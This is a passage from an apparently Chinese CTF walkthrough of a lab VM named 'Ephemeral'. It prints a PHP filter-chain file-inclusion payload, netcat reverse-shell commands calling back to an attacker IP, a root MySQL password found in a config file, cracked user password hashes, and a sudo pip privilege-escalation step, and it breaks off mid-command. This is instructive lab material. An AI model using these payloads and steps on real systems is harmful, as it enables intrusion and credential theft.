daemon,,,:\/var\/run\/avahi-daemon:\/usr\/sbin\/nologin\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/usr\/sbin\/nologin\nsaned:x:117:123::\/var\/lib\/saned:\/usr\/sbin\/nologin\nnm-openvpn:x:118:124:NetworkManager OpenVPN,,,:\/var\/lib\/openvpn\/chroot:\/usr\/sbin\/nologin\nhplip:x:119:7:HPLIP system user,,,:\/run\/hplip:\/bin\/false\nwhoopsie:x:120:125::\/nonexistent:\/bin\/false\ncolord:x:121:126:colord colour management daemon,,,:\/var\/lib\/colord:\/usr\/sbin\/nologin\ngeoclue:x:122:127::\/var\/lib\/geoclue:\/usr\/sbin\/nologin\npulse:x:123:128:PulseAudio daemon,,,:\/var\/run\/pulse:\/usr\/sbin\/nologin\ngnome-initial-setup:x:124:65534::\/run\/gnome-initial-setup\/:\/bin\/false\ngdm:x:125:130:Gnome Display 
Manager:\/var\/lib\/gdm3:\/bin\/false\nsssd:x:126:131:SSSD system user,,,:\/var\/lib\/sss:\/usr\/sbin\/nologin\nkevin:x:1000:1000:kevin,,,:\/home\/kevin:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:127:134:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:128:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:129:135:MySQL Server,,,:\/nonexistent:\/bin\/false\njane:x:1001:1001:,,,:\/home\/jane:\/bin\/bash\ndonald:x:1004:1004::\/home\/donald:\/bin\/rbash\nrandy:x:1002:1002:,,,:\/home\/randy:\/bin\/bash<\/code><\/pre>\n<h3>PHP filter chain construction<\/h3>\n<p>Then try inclusion through the php:\/\/filter wrapper:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# http get http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\nHTTP\/1.1 200 OK\nConnection: Keep-Alive\nContent-Encoding: gzip\nContent-Length: 1699\nContent-Type: text\/html; charset=UTF-8\nDate: Tue, 30 Apr 2024 07:13:55 GMT\nKeep-Alive: timeout=5, max=100\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\n<\/code><\/pre>\n<p>Try constructing a php:\/\/filter chain:<\/p>\n<pre><code 
class=\"language-bash\">http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.885
9_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&amp;0=whoami<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740592.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740592.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430151533944\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Get a <a href=\"https:\/\/www.revshells.com\/\">reverse shell<\/a> (<code>payload<\/code> below stands for the filter chain above):<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&amp;0=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<p>But it did not work; try URL-encoding the command:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&amp;0=nc+-e+%2Fbin%2Fbash+192.168.0.143+1234<\/code><\/pre>\n<p>Try another one:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&amp;0=busybox%20nc%20192.168.0.143%201234%20-e%20bash<\/code><\/pre>\n<p>Hey, the shell came back!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740593.png\" alt=\"image-20240430152419053\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ephemeral:\/var\/www\/html\/prices$ ls 
-la\ntotal 12\ndrwxr-xr-x  2 www-data www-data 4096 Mar 15  2022 .\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 ..\n-rw-r--r--  1 www-data www-data  150 Mar 15  2022 filedownload.php\n(remote) www-data@ephemeral:\/var\/www\/html\/prices$ cd ..\n(remote) www-data@ephemeral:\/var\/www\/html$ ls -la\ntotal 356\ndrwxr-xr-x 11 www-data www-data  4096 Mar 17  2022 .\ndrwxr-xr-x  3 root     root      4096 Mar 14  2022 ..\n-rw-r--r--  1 www-data www-data  1309 Aug 12  2020 LICENSE.txt\n-rw-r--r--  1 www-data www-data   541 Oct 11  2020 READ-ME.txt\n-rw-r--r--  1 www-data www-data 18464 Oct 11  2020 about.html\n-rw-r--r--  1 www-data www-data 20094 Oct 11  2020 blog.html\n-rw-r--r--  1 www-data www-data 14677 Oct 11  2020 booking.html\n-rw-r--r--  1 www-data www-data 66386 Oct 11  2020 car-wash-website-template.jpg\ndrwxr-xr-x  2 www-data www-data  4096 Mar 17  2022 cd\n-rw-r--r--  1 www-data www-data 15151 Oct 11  2020 contact.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 css\ndrwxr-xr-x  2 www-data www-data  4096 Oct 12  2020 img\n-rw-r--r--  1 www-data www-data 39494 Oct 11  2020 index.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 js\ndrwxr-xr-x  8 www-data www-data  4096 Oct 11  2020 lib\n-rw-r--r--  1 www-data www-data 14685 Oct 11  2020 location.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 mail\n-rw-r--r--  1 www-data www-data    44 Mar 15  2022 phpsysinfo.php\ndrwxr-xr-x  2 www-data www-data  4096 Mar 17  2022 price\n-rw-r--r--  1 www-data www-data 14635 Oct 11  2020 price.html\ndrwxr-xr-x  2 www-data www-data  4096 Mar 15  2022 prices\ndrwxr-xr-x  2 root     root      4096 Mar 17  2022 private_html\n-rw-r--r--  1 www-data www-data 16853 Oct 11  2020 service.html\n-rw-r--r--  1 www-data www-data 48856 Oct 11  2020 single.html\n-rw-r--r--  1 www-data www-data 18605 Oct 11  2020 team.html\n(remote) www-data@ephemeral:\/var\/www\/html$ cd private_html\/\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ls -la\ntotal 
12\ndrwxr-xr-x  2 root     root     4096 Mar 17  2022 .\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 ..\n-rwxrwxr-x  1 root     root      337 Mar 17  2022 app.py\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ cat app.py \nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route(&quot;\/page&quot;)\ndef page():\n\n    name = request.values.get(&#039;name&#039;)\n\n    output = Jinja2.from_string(&#039;Welcome &#039; + name + &#039;!&#039;).render()\n\n    return output\n\nif __name__ == &quot;__main__&quot;:\n    app.run(host=&#039;0.0.0.0&#039;, port=5000)\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ss -atlp \nState            Recv-Q           Send-Q                       Local Address:Port                         Peer Address:Port           Process           \nLISTEN           0                128                                0.0.0.0:ssh                               0.0.0.0:*                                \nLISTEN           0                5                                127.0.0.1:ipp                               0.0.0.0:*                                \nLISTEN           0                70                               127.0.0.1:33060                             0.0.0.0:*                                \nLISTEN           0                151                              127.0.0.1:mysql                             0.0.0.0:*                                \nLISTEN           0                4096                             127.0.0.1:41229                             0.0.0.0:*                                \nLISTEN           0                4096                         127.0.0.53%lo:domain                            0.0.0.0:*                                \nLISTEN           0                128                                   [::]:ssh                                  [::]:*                                \nLISTEN           0                5       
                             [::1]:ipp                                  [::]:*                                \nLISTEN           0                511                                      *:http                                    *:*                                \nLISTEN           0                32                                       *:ftp                                     *:*                                \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                    Peer Address:Port         Process         \nudp            UNCONN          0               0                              0.0.0.0:631                          0.0.0.0:*                            \nudp            UNCONN          0               0                        127.0.0.53%lo:53                           0.0.0.0:*                            \nudp            UNCONN          0               0                              0.0.0.0:5353                         0.0.0.0:*                            \nudp            UNCONN          0               0                              0.0.0.0:41443                        0.0.0.0:*                            \nudp            UNCONN          0               0                                 [::]:60043                           [::]:*                            \nudp            UNCONN          0               0                                 [::]:5353                            [::]:*                            \ntcp            LISTEN          0               128                            0.0.0.0:22                           0.0.0.0:*                            \ntcp            LISTEN          0               5                            127.0.0.1:631                          0.0.0.0:*                            \ntcp            LISTEN          0               70                           127.0.0.1:33060                        
0.0.0.0:*                            \ntcp            LISTEN          0               151                          127.0.0.1:3306                         0.0.0.0:*                            \ntcp            LISTEN          0               4096                         127.0.0.1:41229                        0.0.0.0:*                            \ntcp            LISTEN          0               4096                     127.0.0.53%lo:53                           0.0.0.0:*                            \ntcp            LISTEN          0               128                               [::]:22                              [::]:*                            \ntcp            LISTEN          0               5                                [::1]:631                             [::]:*                            \ntcp            LISTEN          0               511                                  *:80                                 *:*                            \ntcp            LISTEN          0               32                                   *:21                                 *:* \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ sudo -l\n[sudo] password for www-data: \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ cd ..\/\n(remote) www-data@ephemeral:\/var\/www\/html$ cd ..\/\n(remote) www-data@ephemeral:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Mar 14  2022 .\ndrwxr-xr-x 15 root     root     4096 Mar 14  2022 ..\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 html\n(remote) www-data@ephemeral:\/var\/www$ cd ..\/\n(remote) www-data@ephemeral:\/var$ ls -la\ntotal 60\ndrwxr-xr-x 15 root root     4096 Mar 14  2022 .\ndrwxr-xr-x 21 root root     4096 Mar 17  2022 ..\ndrwxr-xr-x  2 root root     4096 Mar 18  2022 backups\ndrwxr-xr-x 18 root root     4096 Mar 15  2022 cache\ndrwxrwsrwt  2 root whoopsie 4096 Apr 29 23:56 crash\ndrwxr-xr-x 78 root root     4096 Mar 16  2022 lib\ndrwxrwsr-x  2 root staff    4096 Apr 15  2020 
local\nlrwxrwxrwx  1 root root        9 Mar 14  2022 lock -&gt; \/run\/lock\ndrwxrwxr-x 15 root syslog   4096 Apr 29 23:52 log\ndrwxrwsr-x  2 root mail     4096 Feb 23  2022 mail\ndrwxrwsrwt  2 root whoopsie 4096 Feb 23  2022 metrics\ndrwxr-xr-x  2 root root     4096 Feb 23  2022 opt\nlrwxrwxrwx  1 root root        4 Mar 14  2022 run -&gt; \/run\ndrwxr-xr-x  8 root root     4096 Feb 23  2022 snap\ndrwxr-xr-x  6 root root     4096 Mar 14  2022 spool\ndrwxrwxrwt  2 root root     4096 Apr 30  2024 tmp\ndrwxr-xr-x  3 root root     4096 Mar 14  2022 www\n(remote) www-data@ephemeral:\/var$ cd backups\/\n(remote) www-data@ephemeral:\/var\/backups$ ls -la\n.............\n(remote) www-data@ephemeral:\/var\/backups$ cd ..\/mail\n(remote) www-data@ephemeral:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x  2 root mail 4096 Feb 23  2022 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/mail$ cd ..\/opt\n(remote) www-data@ephemeral:\/var\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Feb 23  2022 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/opt$ cd ..\/tmp \n(remote) www-data@ephemeral:\/var\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 Apr 30  2024 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/tmp$ cat \/etc\/passwd | grep &quot;bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\nkevin:x:1000:1000:kevin,,,:\/home\/kevin:\/bin\/bash\njane:x:1001:1001:,,,:\/home\/jane:\/bin\/bash\ndonald:x:1004:1004::\/home\/donald:\/bin\/rbash\nrandy:x:1002:1002:,,,:\/home\/randy:\/bin\/bash\n(remote) www-data@ephemeral:\/var\/tmp$ cd \/home\n(remote) www-data@ephemeral:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root   root   4096 Mar 15  2022 .\ndrwxr-xr-x 21 root   root   4096 Mar 17  2022 ..\ndrwx------  8 donald donald 4096 Mar 17  2022 donald\ndrwx------  6 jane   jane   4096 Mar 17  2022 jane\ndrwx------ 14 kevin  kevin  4096 Mar 17  2022 kevin\ndrwx------  6 randy  randy  4096 Mar 
17  2022 randy\n(remote) www-data@ephemeral:\/home$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount\n\/usr\/bin\/screen-4.5.0\n\/usr\/bin\/passwd\n\/usr\/bin\/vmware-user-suid-wrapper\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pppd\n\/snap\/core20\/2264\/usr\/bin\/chfn\n\/snap\/core20\/2264\/usr\/bin\/chsh\n\/snap\/core20\/2264\/usr\/bin\/gpasswd\n\/snap\/core20\/2264\/usr\/bin\/mount\n\/snap\/core20\/2264\/usr\/bin\/newgrp\n\/snap\/core20\/2264\/usr\/bin\/passwd\n\/snap\/core20\/2264\/usr\/bin\/su\n\/snap\/core20\/2264\/usr\/bin\/sudo\n\/snap\/core20\/2264\/usr\/bin\/umount\n\/snap\/core20\/2264\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2264\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1376\/usr\/bin\/chfn\n\/snap\/core20\/1376\/usr\/bin\/chsh\n\/snap\/core20\/1376\/usr\/bin\/gpasswd\n\/snap\/core20\/1376\/usr\/bin\/mount\n\/snap\/core20\/1376\/usr\/bin\/newgrp\n\/snap\/core20\/1376\/usr\/bin\/passwd\n\/snap\/core20\/1376\/usr\/bin\/su\n\/snap\/core20\/1376\/usr\/bin\/sudo\n\/snap\/core20\/1376\/usr\/bin\/umount\n\/snap\/core20\/1376\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1376\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/21465\/usr\/lib\/snapd\/snap-confine\n(remote) www-data@ephemeral:\/home$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = 
cap_net_bind_service,cap_net_admin+ep\n\/snap\/core20\/2264\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1376\/usr\/bin\/ping = cap_net_raw+ep\n(remote) www-data@ephemeral:\/home$ cd \/opt\n(remote) www-data@ephemeral:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Mar 16  2022 .\ndrwxr-xr-x 21 root root 4096 Mar 17  2022 ..\ndrwx--x--x  4 root root 4096 Mar 16  2022 containerd<\/code><\/pre>\n<h3>Upload linpeas.sh and pspy64<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740594.png\" alt=\"image-20240430153615327\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740595.png\" alt=\"image-20240430153822808\" \/><\/p>\n<pre><code class=\"language-bash\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking if containerd(ctr) is available\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/containerd-ctr-privilege-escalation\nctr was found in \/usr\/bin\/ctr, you may be able to escalate privileges with it\nctr: failed to dial &quot;\/run\/containerd\/containerd.sock&quot;: connection error: desc = &quot;transport: error while dialing: dial unix \/run\/containerd\/containerd.sock: connect: permission denied&quot;\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking if runc is available\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation\nrunc was found in \/usr\/sbin\/runc, you may be able to escalate privileges with it<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740596.png\" alt=\"image-20240430154415208\" \/><\/p>\n<h3>Getting information from MySQL<\/h3>\n<p>Take a look at the MySQL configuration:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ephemeral:\/tmp$ cd \/etc\/mysql\n(remote) www-data@ephemeral:\/etc\/mysql$ ls -la\ntotal 44\ndrwxr-xr-x   4 root root  4096 Mar 15  2022 .\ndrwxr-xr-x 134 root root 
12288 Mar 18  2022 ..\n-rw-r--r--   1 root root    49 Mar 15  2022 .my.cnf\ndrwxr-xr-x   2 root root  4096 Feb 23  2022 conf.d\n-rwxr-xr-x   1 root root   120 Jan 28  2022 debian-start\n-rw-------   1 root root   317 Mar 15  2022 debian.cnf\nlrwxrwxrwx   1 root root    24 Mar 14  2022 my.cnf -&gt; \/etc\/alternatives\/my.cnf\n-rw-r--r--   1 root root   839 Aug  3  2016 my.cnf.fallback\n-rw-r--r--   1 root root   682 Aug 19  2021 mysql.cnf\ndrwxr-xr-x   2 root root  4096 Mar 15  2022 mysql.conf.d\n(remote) www-data@ephemeral:\/etc\/mysql$ cat .my.cnf\n[client]\nuser=root\npassword=RanDydBPa$$w0rd0987<\/code><\/pre>\n<p>Got the database root password from the world-readable .my.cnf; try logging in:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ephemeral:\/$ mysql -u  root -p\nEnter password: \nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 13\nServer version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)\n\nCopyright (c) 2000, 2022, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. 
Type &#039;\\c&#039; to clear the current input statement.\n\nmysql&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| ephemeral_users    |\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.50 sec)\n\nmysql&gt; use ephemeral_users;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; show tables;\n+---------------------------+\n| Tables_in_ephemeral_users |\n+---------------------------+\n| ephemeral_users           |\n+---------------------------+\n1 row in set (0.00 sec)\n\nmysql&gt; select * from ephemeral_users;\n+--------+------------------------------------------+\n| user   | password                                 |\n+--------+------------------------------------------+\n| kevin  | a7f30291fe998b2f188678090b40d8307ffdeddd |\n| donald | 603ebcdd05c78c0a635b7b0846ef8ad5758b6d7c |\n| jane   | 84f66bc55f616fe45b4d996896e4c9e4121264ef |\n| randy  | d1b10494107b459a80df1e1d5b9b62bd0b24a1ce |\n+--------+------------------------------------------+\n4 rows in set (0.11 sec)<\/code><\/pre>\n<p>Try <a href=\"https:\/\/crackstation.net\/\">cracking<\/a> the hashes!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740597.png\" alt=\"image-20240430154854699\" \/><\/p>\n<pre><code class=\"language-apl\">kevin           jameskevingilmerjr\ndonald          24donaldson\njane            !pass_word\nrandy           !password!23<\/code><\/pre>\n<p>Try brute-forcing the accounts with the recovered passwords:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740598.png\" alt=\"image-20240430155156924\" \/><\/p>\n<h3>kevin-&gt;donald<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ephemeral:\/$ su -l kevin\nPassword: \nkevin@ephemeral:~$ ls -la\ntotal 76\ndrwx------ 14 kevin kevin 4096 Mar 17  2022 .\ndrwxr-xr-x  6 root  root  4096 Mar 15  2022 ..\nlrwxrwxrwx  1 root  root     9 Mar 15  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 kevin kevin  220 Mar 14  2022 .bash_logout\n-rw-r--r--  1 kevin kevin 3771 Mar 14  2022 .bashrc\ndrwxrwxr-x 12 kevin kevin 4096 Apr 30 01:51 .cache\ndrwx------ 11 kevin kevin 4096 Mar 16  2022 .config\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Desktop\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Documents\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Downloads\ndrwx------  3 kevin kevin 4096 
Mar 17  2022 .gnupg\ndrwxr-xr-x  4 kevin kevin 4096 Mar 15  2022 .local\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Music\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Pictures\n-rw-r--r--  1 kevin kevin  807 Mar 14  2022 .profile\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Public\n-rw-------  1 kevin kevin  100 Mar 15  2022 .python_history\n-rw-r--r--  1 kevin kevin    0 Mar 14  2022 .sudo_as_admin_successful\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Templates\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Videos\n-rw-rw-r--  1 kevin kevin  180 Mar 16  2022 .wget-hsts\nkevin@ephemeral:~$ sudo -l\n[sudo] password for kevin: \nMatching Defaults entries for kevin on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser kevin may run the following commands on ephemeral:\n    (donald) PASSWD: \/usr\/bin\/pip3 install *<\/code><\/pre>\n<p>\u5c1d\u8bd5\u63d0\u6743\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/pip\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/pip\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740599.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740599.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430155527899\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">kevin@ephemeral:~$ TF=$(mktemp 
